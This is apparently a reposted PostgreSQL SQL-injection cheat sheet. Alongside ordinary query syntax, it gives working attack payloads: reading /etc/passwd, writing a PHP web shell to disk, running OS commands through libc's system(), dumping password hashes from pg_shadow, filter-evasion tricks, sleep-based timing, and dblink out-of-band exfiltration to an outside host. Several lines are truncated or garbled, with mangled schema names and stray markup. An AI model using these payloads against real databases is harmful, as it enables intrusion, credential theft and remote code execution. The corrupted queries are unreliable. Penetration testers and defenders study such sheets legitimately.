Note :
#Postgresql and PHP supports Batched Queries.
#Awesome,huh?
Version :
SELECT VERSION()
Directories :
SELECT current_setting (‘data_directory’)
SELECT current_setting (‘hba_file’)
SELECT current_setting (‘config_file’)
SELECT current_setting (‘ident_file’)
SELECT current_setting (‘external_pid_file’)
Users :
SELECT user;
SELECT current_user;
SELECT session_user;
SELECT getpgusername();
Current Database :
SELECT current_database();
Concatenation :
SELECT 1||2||3; #Returns 123
Get Collation :
SELECT pg_client_encoding(); #Returns your current encoding (collation).
Change Collation :
SELECT convert(‘foobar_utf8′,’UTF8′,’latin1′); #Converts foobar from utf8 to latin1.
SELECT convert_from(‘foobar_utf8′,sans-serif;">Converts foobar to latin1.
SELECT convert_to(‘foobar’,'UTF8′); #Converts foobar to utf8.
SELECT to_ascii(‘foobar’,'latin1′); #Converts foobar to latin1.
Wildcards in SELECT(s) :
SELECT foo FROM bar WHERE id LIKE ‘test%’; #Returns all COLUMN(s) starting with “test”.
SELECT foo FROM bar WHERE id LIKE ‘%test’; #Returns all COLUMN(s) ending with “test”.
Regular Expression in SELECT(s) :
Returns all columns matching the regular expression.
SELECT foo FROM bar WHERE id ~* ‘(moo|rawr).*’;
SELECT foo FROM bar WHERE id SIMILAR ‘(moo|rawr).*’;
SELECT Without dublicates :
SELECT disTINCT foo FROM bar
Counting Columns :
SELECT COUNT(*) FROM foo.bar; #Returns the amount of rows from the table “foo.bar”.
Get Amount of Postgresql Users :
SELECT COUNT(*) FROM pg_catalog.pg_user
Get Postgresql Users :
SELECT usename FROM pg_user
Get Postgresql User Privileges on Different Columns :
SELECT table_schema,table_name,column_name,privilege_type FROM @R_560_4045@ion_schema.column_privileges
Get Postgresql User Privileges :
SELECT usename,usesysid,usecreatedb,usesuper,usecatupd,valuntil,useconfig FROM pg_catalog.pg_user
Get Postgresql User Credentials & Privileges :
fig FROM pg_catalog.pg_shadow
Get Postgresql DBA Accounts :
SELECT * FROM pg_shadow WHERE usesuper IS TRUE
SELECT * FROM pg_user WHERE usesuper IS TRUE
Get Databases :
SELECT nspname FROM pg_namespace WHERE nspacl IS NOT NULL
SELECT datname FROM pg_database
SELECT schema_name FROM @R_560_4045@ion_schema.schemata
SELECT disTINCT schemaname FROM pg_tables
SELECT disTINCT table_schema FROM @R_560_4045@ion_schema.columns
SELECT disTINCT table_schema FROM @R_560_4045@ion_schema.tables
Get Databases & Tables :
SELECT schemaname,tablename FROM pg_tables
SELECT table_schema,table_name FROM @R_560_4045@ion_schema.tables
SELECT disTINCT table_schema,table_name FROM @R_560_4045@ion_schema.columns
Get Databases,Tables & Columns :
4045@ion_schema.columns
SELECT A Certain Row :
SELECT column_name FROM @R_560_4045@ion_schema.columns LIMIT 1 OFFSET 0; #Returns row 0.
SELECT column_name FROM @R_560_4045@ion_schema.columns LIMIT 1 OFFSET 1; #Returns row 1.
…
SELECT column_name FROM @R_560_4045@ion_schema.columns LIMIT 1 OFFSET N; #Returns row N.
Conversion (Casting) :
SELECT CAST(’1′ AS INTEGER) #Converts the varchar “1″ to integer.
Substring :
SELECT SUBSTR(‘foobar’,1,3); #Returns foo.
SELECT SUBSTRING(‘foobar’,sans-serif;">Returns foo.
Hexadecimal Evasion :
Not as fancy as in MysqL,but it sure works!
SELECT decode(’41424344′,’hex’); #Returns ABCD.
SELECT decode(to_hex(65),chr(104)||chr(101)||chr(120)); #Returns A.
ASCII to Number :
SELECT ASCII(‘A’); #Returns 65.
Number to ASCII :
SELECT CHR(65); #If Statement :
Impossible in SELECT statements.
#However,here’s a work-around with sub-select(s).
SELECT (SELECT 1 WHERE 1=1); #Returns 1.
SELECT (SELECT 1 WHERE 1=2); #Returns NULL.
Case Statement :
May be used instead of the If-Statement.
SELECT CASE WHEN 1=1 THEN 1 ELSE 0 END; #Returns 1.
Read File(s) :
CREATE TABLE file(content text);
copY file FROM ‘/etc/passwd’;
UNION ALL SELECT content FROM file LIMIT 1 OFFSET 0;
UNION ALL SELECT content FROM file LIMIT 1 OFFSET 1;
UNION ALL SELECT content FROM file LIMIT 1 OFFSET N;
DROP TABLE file;
Write File(s) :
INSERT INTO file(content) VALUES (‘<?PHP $s=$_GET;@chdir($s[/'x/']);echo@system($s[/'y/'])?>’);
copY file(content) TO ‘/tmp/shell.PHP’;
Logical Operator(s) :
http://en.wikipedia.org/wiki/Logical_connective
AND
OR
NOT
Comments :
SELECT foo,bar FROM foo.bar/*Multi line comment */
SELECT foo,bar FROM foo.bar–Single line comment
A few evasions/methods to use between your Postgresql statements :
CR (%0D); #Carrier Return.
LF (%0A); #Line Feed.
Tab (%09); #The Tab-key.
Space (%20); #Most commonly used. You kNow what a space is.
Multiline Comment (/**/); #Well,as the name says.
Parenthesis,( and ); #Can also be used as separators when used right.
Parenthesis instead of space :
As said two lines above,the use of parenthesis can be used as a separator.
SELECT * FROM foo.bar WHERE id=(-1)UNION(SELECT(1),(2));
Auto-Casting to Right Collation :
SELECT CONVERT_TO(‘foobar’,pg_client_encoding());
Benchmark :
Takes about 7.5 seconds to perform this logical operation.
Which can be compared to BENCHMARK(MD5(1),1500000) on MysqL.
SELECT (||/(9999!));
Sleep :
SELECT PG_SLEEP(5); #Sleeps the Postgresql database for 5 seconds.
Get Postgresql IP :
SELECT inet_server_addr()
Get Postgresql Port :
SELECT inet_server_port()
Command Execution :
CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS ‘/lib/libc.so.6′,‘system’ LANGUAGE ‘C’ STRICT;
SELECT system(‘echo Hello.’);
DNS Requests (OOB (out-of-band )) :
SELECT * FROM dblink(‘host=www.your.host.com user=DB_Username dbname=DB’,‘SELECT YourQuery’) RETURNS (result TEXT);
Having Fun With Postgresql :
- dblink: The Root Of All Evil
- Mapping Library Functions
- From Sleeping and copying In Postgresql 8.2
- Recommendation and Prevention
- Introducing pgshell
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 [email protected] 举报,一经查实,本站将立刻删除。
